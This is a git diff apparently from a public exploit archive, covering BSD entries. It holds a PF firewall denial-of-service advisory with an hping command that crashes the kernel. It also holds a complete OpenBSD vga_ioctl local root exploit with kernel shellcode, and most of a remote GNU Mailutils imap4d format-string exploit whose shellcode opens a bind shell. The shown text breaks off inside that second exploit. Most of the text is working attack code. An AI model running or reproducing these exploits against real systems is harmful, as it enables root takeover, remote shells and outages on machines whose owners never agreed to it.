[2008-01-18] diff --git a/platforms/bsd/dos/8581.txt b/platforms/bsd/dos/8581.txt index 4078af6e7..61d1f4040 100755 --- a/platforms/bsd/dos/8581.txt +++ b/platforms/bsd/dos/8581.txt @@ -1,142 +1,142 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Rembrandt -Date : 2009-04-30 -Found : 2009-04-09 -Affected Software: PF (OpenBSD Packet Filter) -Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11 - NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13 - MirOS #10 and earlier - MidnightBSD 0.3-current -Not affected OS : FreeBSD - NetBSD 3.x, 4.x, 5.x (patched before release) - DragonflyBSD - Debian GNU/kFreeBSD - MidnightBSD prior 0.3 - - Older versions of OpenBSD PF and products based - thereon might be affected as well. - The Bug was introduced between the OpenBSD 4.1 and 4.2 - release. - -Type : Denial of Service - -OSVDB : 53608 -Milw0rm : 8406 -CVE : -ISS X-Force: : -BID : 34482 -Secunia : 34676 -VUPEN ID : ADV-2009-1015 - -This advisory supercedes the original advisory which was just related to -OpenBSD because we had to publish an announcement in response to OpenBSD's -reaction. - -Trying to fix it responsibly and get in contact with the vendor: - --- OpenBSD -- -Contacted 2009-04-09 16:35 UTC -Patch available 2009-04-11 23:43 UTC - -We received no response nor a notification about an upcoming patch. -Also we had no chance to coordinate or inform other projects before OpenBSD -issued the patch and a statement. - -We like to mention that the issued patch is just a workaround and does not -patch or remove the affected code. - --- NetBSD -- -Contacted and asked for confirmation 2009-04-15 06:00 UTC -Were informed about further investigations 2009-04-15 9:42 UTC -Received information about upcoming Patches 2009-04-15 11:57 UTC -Received confirmation for 5.x up to RC3 and HEAD 2009-04-15 12:17 UTC - -We thank the NetBSD team that they patched the PF bug prior the 5.x release! - --- FreeBSD -- -Contacted and asked for confirmation 2009-04-15 06:56 UTC -Were informed about further investigations 2009-04-15 7:56 UTC -Were informed about not being vulnerable 2009-04-15 22:05 UTC - --- DragonflyBSD -- -Contacted and asked for confirmation 2009-04-15 06:10 UTC -Were informed about not being vulnerable 2009-04-15 21:35 UTC - --- MirOS (MirBSD) -- -Contacted and asked for official confirmation 2009-04-15 06:36 UTC -Received confirmation for MirBSD 10 and prior 2009-04-15 17:57 UTC - --- MidnightBSD -- -Contacted and asked for official confirmation 2009-04-15 20:17 UTC -Received confirmation for MidnightBSD 2009-04-15 22:37 UTC - --- Debian GNU/kFreeBSD -- -Contacted and asked for official confirmation 2009-04-15 22:41 UTC -Were informed about not being vulnerable 2009-04-15 23:35 UTC --- END -- - - -OpenBSDs PF firewall is prone to a remote Denial of Service due to a NULL- -pointer dereference when handling special crafted IP datagrams. If the -firewall handles such a packet the kernel panics. -An example for such a packet would be a IPv4 packet with a ICMPv6 payload. - -This affects multiple vendors because PF was incorporated into serveral OS. - -The problem stems from the unification of the rule processing in pf_test_rule(). -With this unification ICMPv6 logic was applied to IPv4 packets and vice versa. -Because the handling logic asserts that the common code in pf_test has verified -that the packet contains a full ICMP header and has pulled up the mbuf up to -that point. This assertion fails when the wrong AF-version is used by pf_test -and thus pf_test_rule tries to access not allocated memory. -The affected function is in pf_change_a6 and the patch is just a workaround -because it filters the packet in pf_test() except of fixing the affected source -code. - - -Steps to reproduce: - -If you have an affected OS in your network which does NAT or redirecting traffic -you should be able to test your IPv4 device with this simple hping command: - -hping -0 -H 58 $a_host - - -Patches are provided for: - -OpenBSD 4.3 - 4.5 (not for 4.2), HEAD after 2009-04-11 -NetBSD 4.x (patched for consistency) - 5.0RC3, HEAD after 2009-04-13 -MirBSD 10 -MidnightBSD 0.3-current - - -Workaround: - -The OpenBSD developers provide hints for a workaround at their errata -website too. - - -We like to thank the security teams of the following projects for -their friendly cooperation: - -DragonflyBSD -NetBSD -FreeBSD -MidnightBSD -MirBSD - -Special thanks goes to Andreas Bogk who assisted in the assembly analysis and -Adrian Portelli of the NetBSD project for his time and permanent suggestions. - - -Kind regards, -Rembrandt - -# milw0rm.com [2009-04-30] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Rembrandt +Date : 2009-04-30 +Found : 2009-04-09 +Affected Software: PF (OpenBSD Packet Filter) +Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11 + NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13 + MirOS #10 and earlier + MidnightBSD 0.3-current +Not affected OS : FreeBSD + NetBSD 3.x, 4.x, 5.x (patched before release) + DragonflyBSD + Debian GNU/kFreeBSD + MidnightBSD prior 0.3 + + Older versions of OpenBSD PF and products based + thereon might be affected as well. + The Bug was introduced between the OpenBSD 4.1 and 4.2 + release. + +Type : Denial of Service + +OSVDB : 53608 +Milw0rm : 8406 +CVE : +ISS X-Force: : +BID : 34482 +Secunia : 34676 +VUPEN ID : ADV-2009-1015 + +This advisory supercedes the original advisory which was just related to +OpenBSD because we had to publish an announcement in response to OpenBSD's +reaction. + +Trying to fix it responsibly and get in contact with the vendor: + +-- OpenBSD -- +Contacted 2009-04-09 16:35 UTC +Patch available 2009-04-11 23:43 UTC + +We received no response nor a notification about an upcoming patch. +Also we had no chance to coordinate or inform other projects before OpenBSD +issued the patch and a statement. + +We like to mention that the issued patch is just a workaround and does not +patch or remove the affected code. + +-- NetBSD -- +Contacted and asked for confirmation 2009-04-15 06:00 UTC +Were informed about further investigations 2009-04-15 9:42 UTC +Received information about upcoming Patches 2009-04-15 11:57 UTC +Received confirmation for 5.x up to RC3 and HEAD 2009-04-15 12:17 UTC + +We thank the NetBSD team that they patched the PF bug prior the 5.x release! + +-- FreeBSD -- +Contacted and asked for confirmation 2009-04-15 06:56 UTC +Were informed about further investigations 2009-04-15 7:56 UTC +Were informed about not being vulnerable 2009-04-15 22:05 UTC + +-- DragonflyBSD -- +Contacted and asked for confirmation 2009-04-15 06:10 UTC +Were informed about not being vulnerable 2009-04-15 21:35 UTC + +-- MirOS (MirBSD) -- +Contacted and asked for official confirmation 2009-04-15 06:36 UTC +Received confirmation for MirBSD 10 and prior 2009-04-15 17:57 UTC + +-- MidnightBSD -- +Contacted and asked for official confirmation 2009-04-15 20:17 UTC +Received confirmation for MidnightBSD 2009-04-15 22:37 UTC + +-- Debian GNU/kFreeBSD -- +Contacted and asked for official confirmation 2009-04-15 22:41 UTC +Were informed about not being vulnerable 2009-04-15 23:35 UTC +-- END -- + + +OpenBSDs PF firewall is prone to a remote Denial of Service due to a NULL- +pointer dereference when handling special crafted IP datagrams. If the +firewall handles such a packet the kernel panics. +An example for such a packet would be a IPv4 packet with a ICMPv6 payload. + +This affects multiple vendors because PF was incorporated into serveral OS. + +The problem stems from the unification of the rule processing in pf_test_rule(). +With this unification ICMPv6 logic was applied to IPv4 packets and vice versa. +Because the handling logic asserts that the common code in pf_test has verified +that the packet contains a full ICMP header and has pulled up the mbuf up to +that point. This assertion fails when the wrong AF-version is used by pf_test +and thus pf_test_rule tries to access not allocated memory. +The affected function is in pf_change_a6 and the patch is just a workaround +because it filters the packet in pf_test() except of fixing the affected source +code. + + +Steps to reproduce: + +If you have an affected OS in your network which does NAT or redirecting traffic +you should be able to test your IPv4 device with this simple hping command: + +hping -0 -H 58 $a_host + + +Patches are provided for: + +OpenBSD 4.3 - 4.5 (not for 4.2), HEAD after 2009-04-11 +NetBSD 4.x (patched for consistency) - 5.0RC3, HEAD after 2009-04-13 +MirBSD 10 +MidnightBSD 0.3-current + + +Workaround: + +The OpenBSD developers provide hints for a workaround at their errata +website too. + + +We like to thank the security teams of the following projects for +their friendly cooperation: + +DragonflyBSD +NetBSD +FreeBSD +MidnightBSD +MirBSD + +Special thanks goes to Andreas Bogk who assisted in the assembly analysis and +Adrian Portelli of the NetBSD project for his time and permanent suggestions. + + +Kind regards, +Rembrandt + +# milw0rm.com [2009-04-30] diff --git a/platforms/bsd/dos/869.c b/platforms/bsd/dos/869.c index 8c2b26aee..17f0a23f2 100755 --- a/platforms/bsd/dos/869.c +++ b/platforms/bsd/dos/869.c @@ -144,6 +144,6 @@ return EX_NOHOST; printf("Packet sent. Remote machine should crash.\n"); shutdown(mysock, 2); return EX_OK; -} - -// milw0rm.com [2005-03-09] +} + +// milw0rm.com [2005-03-09] diff --git a/platforms/bsd/local/118.c b/platforms/bsd/local/118.c index 00ce9fc90..637504e93 100755 --- a/platforms/bsd/local/118.c +++ b/platforms/bsd/local/118.c @@ -315,6 +315,6 @@ write(fd,&xep,sizeof(xep)); write(fd,exe,sizeof(exe)); printf("Now exec %s\n",fil); -} - -// milw0rm.com [2003-11-07] +} + +// milw0rm.com [2003-11-07] diff --git a/platforms/bsd/local/125.c b/platforms/bsd/local/125.c index f0488e698..b6fb83f95 100755 --- a/platforms/bsd/local/125.c +++ b/platforms/bsd/local/125.c @@ -311,6 +311,6 @@ get_proc(pid_t pid, struct kinfo_proc *kp) exit(-1); } -} - -// milw0rm.com [2003-11-19] +} + +// milw0rm.com [2003-11-19] diff --git a/platforms/bsd/local/200.c b/platforms/bsd/local/200.c index 37d7e4d92..41d1bfb26 100755 --- a/platforms/bsd/local/200.c +++ b/platforms/bsd/local/200.c @@ -30,6 +30,6 @@ int main(int argc,char **argv){ exit(1); } } - - -// milw0rm.com [2000-11-21] + + +// milw0rm.com [2000-11-21] diff --git a/platforms/bsd/local/202.c b/platforms/bsd/local/202.c index 8ceb2010a..2bd3a240e 100755 --- a/platforms/bsd/local/202.c +++ b/platforms/bsd/local/202.c @@ -82,6 +82,6 @@ main() } exit(0); } - - -// milw0rm.com [2000-11-21] + + +// milw0rm.com [2000-11-21] diff --git a/platforms/bsd/local/207.c b/platforms/bsd/local/207.c index 760ae49c3..e964f1061 100755 --- a/platforms/bsd/local/207.c +++ b/platforms/bsd/local/207.c @@ -34,6 +34,6 @@ int main(int argc,char **argv){ exit(1); } } - - -// milw0rm.com [2000-11-30] + + +// milw0rm.com [2000-11-30] diff --git a/platforms/bsd/local/243.c b/platforms/bsd/local/243.c index c87878e43..0bb91f3f4 100755 --- a/platforms/bsd/local/243.c +++ b/platforms/bsd/local/243.c @@ -116,6 +116,6 @@ code); execve("/usr/bin/chpass", args, envs); perror("execve"); } - - -// milw0rm.com [2001-01-12] + + +// milw0rm.com [2001-01-12] diff --git a/platforms/bsd/local/3094.c b/platforms/bsd/local/3094.c index 9285d9019..7c9d28a9b 100755 --- a/platforms/bsd/local/3094.c +++ b/platforms/bsd/local/3094.c @@ -1,133 +1,133 @@ -/* - -Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit - -Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org) -Some code had been stolen from noir's openbsd exploit sources - -Fix is available: -ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch - -Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007 - -Linkejimai neegzistuojancio fronto kariams ;] -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/ -#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/ - -char shellcode[]= -"\x18\x00\x00\x00" -"\x18\x00\x00\x00" -"\x18\x00\x00\x00" /* some crap */ -"\x18\x00\x00\x00" -"\x18\x00\x00\x00" - -"\x18\x00\x00\x00" /* jmp 0x00000018 */ - -"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad" -"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred shellcode */ -"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04" - -"\xb8\x51\x47\x48\xd0" -"\xff\xe0"; - -void usage() -{ -printf("Usage: crit_obsd_ex target\n\n"); -printf("valid targets:\n"); -printf("(1)\tobsd 4.0 generic i386\n"); -printf("(2)\tobsd 3.9 generic i386\n\n"); -exit(0); -} - -void get_proc(pid_t pid, struct kinfo_proc *kp) -{ - u_int arr[4], len; - - arr[0] = CTL_KERN; - arr[1] = KERN_PROC; - arr[2] = KERN_PROC_PID; - arr[3] = pid; - len = sizeof(struct kinfo_proc); - if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { - perror("sysctl"); - printf("this is an unexpected error, rerun!\n"); - exit(-1); - } -} - -int main(int ac, char *av[]) -{ - int i; - void *p; - int fd,failas; - u_long pprocadr; - struct kinfo_proc kp; - -printf("\n+--------------------------------------------+\n"); -printf("| Critical Security local obsd root |\n"); -printf("+--------------------------------------------+\n\n"); - -if (ac<2) usage(); -if(atoi(av[1])==1) -{ -for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i]; -} -else if(atoi(av[1])==2) -{ -for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i]; -} -else {usage();} - - get_proc((pid_t) getpid(), &kp); - pprocadr = (u_long) kp.kp_eproc.e_paddr; - - shellcode[24+5] = pprocadr & 0xff; - shellcode[24+6] = (pprocadr >> 8) & 0xff; - shellcode[24+7] = (pprocadr >> 16) & 0xff; - shellcode[24+8] = (pprocadr >> 24) & 0xff; - - printf("[~] shellcode size: %d\n",sizeof(shellcode)); - - fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); - if(fd < 0) - err(1, "open"); - - write(fd, shellcode, sizeof(shellcode)); - if((lseek(fd, 0L, SEEK_SET)) < 0) - err(1, "lseek"); - - p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0); - if (p == MAP_FAILED) - err(1, "mmap"); - - printf("[~] map addr: 0x%x\n",p); - printf("[~] exploiting...\n"); - failas = open(AGP_DEVICE, O_RDWR); - syscall(SYS_ioctl, failas, 0x80044103, NULL); - - close(failas); - close(fd); - - seteuid(0); - setuid(0); - printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid()); - execl("/bin/sh", "cyber", NULL); - -} - -// milw0rm.com [2007-01-07] +/* + +Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit + +Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org) +Some code had been stolen from noir's openbsd exploit sources + +Fix is available: +ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch + +Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007 + +Linkejimai neegzistuojancio fronto kariams ;] +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/ +#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/ + +char shellcode[]= +"\x18\x00\x00\x00" +"\x18\x00\x00\x00" +"\x18\x00\x00\x00" /* some crap */ +"\x18\x00\x00\x00" +"\x18\x00\x00\x00" + +"\x18\x00\x00\x00" /* jmp 0x00000018 */ + +"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad" +"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred shellcode */ +"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04" + +"\xb8\x51\x47\x48\xd0" +"\xff\xe0"; + +void usage() +{ +printf("Usage: crit_obsd_ex target\n\n"); +printf("valid targets:\n"); +printf("(1)\tobsd 4.0 generic i386\n"); +printf("(2)\tobsd 3.9 generic i386\n\n"); +exit(0); +} + +void get_proc(pid_t pid, struct kinfo_proc *kp) +{ + u_int arr[4], len; + + arr[0] = CTL_KERN; + arr[1] = KERN_PROC; + arr[2] = KERN_PROC_PID; + arr[3] = pid; + len = sizeof(struct kinfo_proc); + if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { + perror("sysctl"); + printf("this is an unexpected error, rerun!\n"); + exit(-1); + } +} + +int main(int ac, char *av[]) +{ + int i; + void *p; + int fd,failas; + u_long pprocadr; + struct kinfo_proc kp; + +printf("\n+--------------------------------------------+\n"); +printf("| Critical Security local obsd root |\n"); +printf("+--------------------------------------------+\n\n"); + +if (ac<2) usage(); +if(atoi(av[1])==1) +{ +for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i]; +} +else if(atoi(av[1])==2) +{ +for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i]; +} +else {usage();} + + get_proc((pid_t) getpid(), &kp); + pprocadr = (u_long) kp.kp_eproc.e_paddr; + + shellcode[24+5] = pprocadr & 0xff; + shellcode[24+6] = (pprocadr >> 8) & 0xff; + shellcode[24+7] = (pprocadr >> 16) & 0xff; + shellcode[24+8] = (pprocadr >> 24) & 0xff; + + printf("[~] shellcode size: %d\n",sizeof(shellcode)); + + fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); + if(fd < 0) + err(1, "open"); + + write(fd, shellcode, sizeof(shellcode)); + if((lseek(fd, 0L, SEEK_SET)) < 0) + err(1, "lseek"); + + p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0); + if (p == MAP_FAILED) + err(1, "mmap"); + + printf("[~] map addr: 0x%x\n",p); + printf("[~] exploiting...\n"); + failas = open(AGP_DEVICE, O_RDWR); + syscall(SYS_ioctl, failas, 0x80044103, NULL); + + close(failas); + close(fd); + + seteuid(0); + setuid(0); + printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid()); + execl("/bin/sh", "cyber", NULL); + +} + +// milw0rm.com [2007-01-07] diff --git a/platforms/bsd/local/396.c b/platforms/bsd/local/396.c index 05349f471..ddb52dcbd 100755 --- a/platforms/bsd/local/396.c +++ b/platforms/bsd/local/396.c @@ -122,6 +122,6 @@ strncpy(tmp, p, 20); mkd(tmp); printf("pwd\r\n"); } - - -// milw0rm.com [2002-01-01] + + +// milw0rm.com [2002-01-01] diff --git a/platforms/bsd/local/579.sh b/platforms/bsd/local/579.sh index 1d46b4a85..ab178bf7b 100755 --- a/platforms/bsd/local/579.sh +++ b/platforms/bsd/local/579.sh @@ -39,6 +39,6 @@ EOF /bin/chmod 755 ./netstat echo "trying to exploit" -PATH=./ "${BMON_EXEC}" -n - -# milw0rm.com [2004-10-16] +PATH=./ "${BMON_EXEC}" -n + +# milw0rm.com [2004-10-16] diff --git a/platforms/bsd/local/739.c b/platforms/bsd/local/739.c index 6a03e6ef5..7873b8f95 100755 --- a/platforms/bsd/local/739.c +++ b/platforms/bsd/local/739.c @@ -73,6 +73,6 @@ main(void) putenv(scbuf); system("/bin/bash"); -} - -// milw0rm.com [2001-07-23] +} + +// milw0rm.com [2001-07-23] diff --git a/platforms/bsd/remote/1234.c b/platforms/bsd/remote/1234.c index 516250ad6..158bb7fd7 100755 --- a/platforms/bsd/remote/1234.c +++ b/platforms/bsd/remote/1234.c @@ -1,483 +1,483 @@ -/* -* Copyright (c) 2005 Rosiello Security -* http://www.rosiello.org -* -* Permission is granted for the redistribution of this software -* electronically. It may not be edited in any way without the express -* written consent of Rosiello Security. -* -* Disclaimer: The author published the information under the condition -* that is not in the intention of the reader to use them in order to bring -* to himself or others a profit or to bring to others damage. -* -* -------------------------------------------------------------------------- -* -* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability -* iDEFENSE Security Advisory 09.09.05 -* www.idefense.com/application/poi/display?id=303&type=vulnerabilities -* -* The GNU mailutils package is a collection of mail-related -* utilities, including local and remote mailbox access services. -* More information is available at the following site: -* http://www.gnu.org/software/mailutils/mailutils.html -* -* This exploit shows the possibility to run arbitrary code -* on FreeBSD machines. -* -* Authors: Johnny Mast and Angelo Rosiello -* e-mails: rave@rosiello.org angelo@rosiello.org -*/ - -#include -#include -#include -#include -#include -#include -#include -#include - -#include -#include -#include -#include - - -#define ISIP(m) (!((int)inet_addr(m) ==-1)) -#define clean(x) memset(x, 0 , sizeof x) - -char code[] = -"\x90\x90\x90\x90" -"\x90\x90\x90\x90" -"\x90\x90\x90\x90" -"\x31\xc0" /* xor %eax,%eax */ -"\x31\xc0" /* xor %eax,%eax */ -"\x50" /* push %eax */ -"\x31\xc0" /* xor %eax,%eax */ -"\x50" /* push %eax */ -"\xb0\x7e" /* mov $0x7e,%al */ -"\x50" /* push %eax */ -"\xcd\x80" /* int $0x80 */ -"\x31\xc0" /* xor %eax,%eax */ - -/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */ -"\x31\xc0" // xorl %eax,%eax -"\x31\xdb" // xorl %ebx,%ebx -"\x31\xc9" // xorl %ecx,%ecx -"\x31\xd2" // xorl %edx,%edx -"\xb0\x61" // movb $0x61,%al -"\x51" // pushl %ecx -"\xb1\x06" // movb $0x6,%cl -"\x51" // pushl %ecx -"\xb1\x01" // movb $0x1,%cl -"\x51" // pushl %ecx -"\xb1\x02" // movb $0x2,%cl -"\x51" // pushl %ecx -"\x8d\x0c\x24" // leal (%esp),%ecx -"\x51" // pushl %ecx -"\xcd\x80" // int $0x80 - -/* it binds on port 30464 */ -/* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */ -"\xb1\x02" // movb $0x2,%cl -"\x31\xc9" // xorl %ecx,%ecx -"\x51" // pushl %ecx -"\x51" // pushl %ecx -"\x51" // pushl %ecx - -/* port = 0x77, change if needed */ -"\x80\xc1\x77" // addb $0x77,%cl -"\x66\x51" // pushw %cx -"\xb5\x02" // movb $0x2,%ch -"\x66\x51" // pushw %cx -"\x8d\x0c\x24" // leal (%esp),%ecx -"\xb2\x10" // movb $0x10,%dl -"\x52" // pushl %edx -"\x51" // pushl %ecx -"\x50" // pushl %eax -"\x8d\x0c\x24" // leal (%esp),%ecx -"\x51" // pushl %ecx -"\x89\xc2" // movl %eax,%edx -"\x31\xc0" // xorl %eax,%eax -"\xb0\x68" // movb $0x68,%al -"\xcd\x80" // int $0x80 - -/* listen(fd, 1)*/ -"\xb3\x01" // movb $0x1,%bl -"\x53" // pushl %ebx -"\x52" // pushl %edx -"\x8d\x0c\x24" // leal (%esp),%ecx -"\x51" // pushl %ecx -"\x31\xc0" // xorl %eax,%eax -"\xb0\x6a" // movb $0x6a,%al -"\xcd\x80" // int $0x80 - -/* cli = accept(fd, 0,0) */ -"\x31\xc0" // xorl %eax,%eax -"\x50" // pushl %eax -"\x50" // pushl %eax -"\x52" // pushl %edx -"\x8d\x0c\x24" // leal (%esp),%ecx -"\x51" // pushl %ecx -"\x31\xc9" // xorl %ecx,%ecx -"\xb0\x1e" // movb $0x1e,%al -"\xcd\x80" // int $0x80 - -/* dup2(cli,0) */ -"\x89\xc3" // movl %eax,%ebx -"\x53" // pushl %ebx -"\x51" // pushl %ecx -"\x31\xc0" // xorl %eax,%eax -"\xb0\x5a" // movb $0x5a,%al -"\xcd\x80" // int $0x80 - -/* dup2(cli, 1) */ -"\x41" // inc %ecx -"\x53" // pushl %ebx -"\x51" // pushl %ecx -"\x31\xc0" // xorl %eax,%eax -"\xb0\x5a" // movb $0x5a,%al -"\xcd\x80" // int $0x80 - -/* dup2(cli, 2) */ -"\x41" // inc %ecx -"\x53" // pushl %ebx -"\x51" // pushl %ecx -"\x31\xc0" // xorl %eax,%eax -"\xb0\x5a" // movb $0x5a,%al -"\xcd\x80" // int $0x80 - -/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */ -"\x31\xdb" // xorl %ebx,%ebx -"\x53" // pushl %ebx -"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e -"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f -"\x89\xe3" // movl %esp,%ebx -"\x31\xc0" // xorl %eax,%eax -"\x50" // pushl %eax -"\x54" // pushl %esp -"\x53" // pushl %ebx -"\x50" // pushl %eax -"\xb0\x3b" // mov $0x3b,%al -"\xcd\x80" // int $0x80 - -/* exit(..) */ -"\x31\xc0" // xorl %eax,%eax -"\xb0\x01" // mobv $0x1,%al -"\xcd\x80"; // int $0x80 - - - -void usage( int argc, char **argv ) -{ - - fprintf(stdout, "%s usage:\n\n", argv[0]); - fprintf(stdout, "\t-h host\n"); - fprintf(stdout, "\t-p port\n"); - fprintf(stdout, "\t-l login\n"); - fprintf(stdout, "\t-a password\n\n"); - - return; -} - - -void send_message( int fd, char *msg, ... ) -{ - char string[2000]; - int len; - size_t size; - - va_list args; - - - clean(string); - - - va_start(args, msg); - len = vsnprintf(string, sizeof(string)-1, msg,args); - len = (len >=0) ? len : 0; - - /* Terminating the string */ - string[len]='\0'; - - write(fd, string, len); - - return; -} - - - - - -char *buildstring( long r_addr, long target, int offset, int sock ) -{ - unsigned char string[512], a[4]; - int len; - int high, low, arw; - - - - high = ( target & 0xffff0000 ) >> 16; - low = ( target & 0x0000ffff ); - - clean(a); - a[0] = (r_addr >> 24) & 0xff; - a[1] = (r_addr >> 16) & 0xff; - a[2] = (r_addr >> 8) & 0xff; - a[3] = (r_addr) & 0xff; - a[4] = '\0'; - - clean(string); - len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n", - (int)a[3]+2,a[2],a[1],a[0], - high -(0x24+13), /* Number of bytes for the first write */ - offset /* The Offset to addr */ - ); - - len = (len >=0) ? len : 0; - string[len] = '\0'; - write(sock, string, len); - - read(sock, string, sizeof(string)); - - - clean(string); - len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n", - (int) a[3], (int)a[2], (int)a[1],(int)a[0], - low - (0x24 +13), - offset, /* The offset to addr +2 */ - code - ); - - len = (len >=0) ? len : 0; - string[len] = '\0'; - write(sock, string, len); - - - return (char *)strdup(string); -} - - -void get_addr_as_char( u_int addr, char *buf ) -{ - *(u_int*)buf = addr; - if (!buf[0]) buf[0]++; - if (!buf[1]) buf[1]++; - if (!buf[2]) buf[2]++; - if (!buf[3]) buf[3]++; -} - -static int got_entry = 0x08057a0c+4; - - -int comun( char *host, struct sockaddr_in sin4 ) -{ - char *a[4] = { "/usr/bin/telnet", host , "30464", NULL }; - execve(a[0],a, NULL); - return 0; -} - -void welcome( ) -{ - fprintf( stdout, "\nCopyright (c) 2005 Rosiello Security\n" ); - fprintf( stdout, "http://www.rosiello.org\n" ); - fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" ); -} - -int main( int argc, char **argv ) -{ - struct hostent *hp; - struct sockaddr_in sin4; - char shellbuf[1030]; - char *host, buffer[512], *ptr, *p, *USER, *PASS; - int ch, port = 0, sock, offset = 1; - int login = 0, i, calc = 0; - int ret = 0, len = 0, b; - int have_shell_loc = 0; - unsigned int shell_addr = (u_int)0x0806c000; - - welcome( ); - - if ( argc < 9 ) - { - usage(argc, argv); - exit(EXIT_SUCCESS); - } - - if (!(host = malloc (128))) - { - fprintf(stderr, "exp.c:115 Could not allocate memory\n"); - exit(EXIT_FAILURE); - } - - - while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF) - { - switch(ch) - { - case 'h': - host = (char *)strdup(optarg); - break; - - case 'V': - break; - - case 'p': - port = atoi (optarg); - break; - - case 'l': - USER = (char *)optarg; - break; - - case 'a': - PASS = (char *)optarg; - break; - - default: - usage(argc, argv); - break; - } -} - - - - if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) - { - fprintf(stderr, "exp.c:139 Error creating an new socket"); - exit(EXIT_FAILURE); - } - - host = (host) ? host : "localhost"; - port = (port) ? port : 143; - - if (!(ISIP(host))) - { - if (!(hp = gethostbyname(host))) - { - fprintf(stderr, "exp.c:152 Could not resolve ip address\n"); - exit(EXIT_FAILURE); - } - - memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length); - host = (char *)strdup(inet_ntoa(sin4.sin_addr)); - } else - sin4.sin_addr.s_addr = inet_addr(host); - - - - - sin4.sin_family = AF_INET; - sin4.sin_port = (unsigned short)htons( port ); - - fprintf(stdout, "[+] Connecting to %s:%d\n", host,port); - - if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0) - { - fprintf(stderr, "[*] exp.c:178 Connection failed\n"); - exit(EXIT_FAILURE); - } - - - fprintf(stdout, "[+] Connected .. \n"); - fprintf(stdout, "[+] Sending login ... \n"); - - send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS); - fprintf(stdout, "[+] Done ... \n"); - - while ((read(sock, buffer, 512)) > 0) - { - if ( login == 0 && ret == 0) - switch (buffer[0]) - { - - case '1': - fprintf(stdout, "[+] Selecting inbox ..\n"); - send_message(sock, "2 Select inbox\n"); - fprintf(stdout, "[+] Selecting Done .. Starting brute sequence\n"); - send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); - login = 1; - break; - } - - - if ((ptr=strstr(buffer, "(near")) && login == 1) - { - ptr +=15; - if ((strncmp(ptr, "41414141",8))!=0) - { - offset ++; - send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); - } - else - { - fprintf(stdout, "[+] Found offset %d\n", offset); - fprintf(stdout, "[+] Finding buffer on the stack\n"); - ret = 1; - login = 0; - clean(buffer); - } - } - - if ( ret == 1 ) - { - - if ((ptr=strstr(buffer, "(near"))) - { - ptr +=6+4 +1; /* +4 for the addr string*/ - /* +1 for the junk char */ - calc = strlen(buffer) - strlen(ptr); - calc -=6+4+1; - - for (i = 0; i < strlen(buffer); i++) - { - if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1) - { - shell_addr += i -4; - have_shell_loc = 1; - sleep(2); - 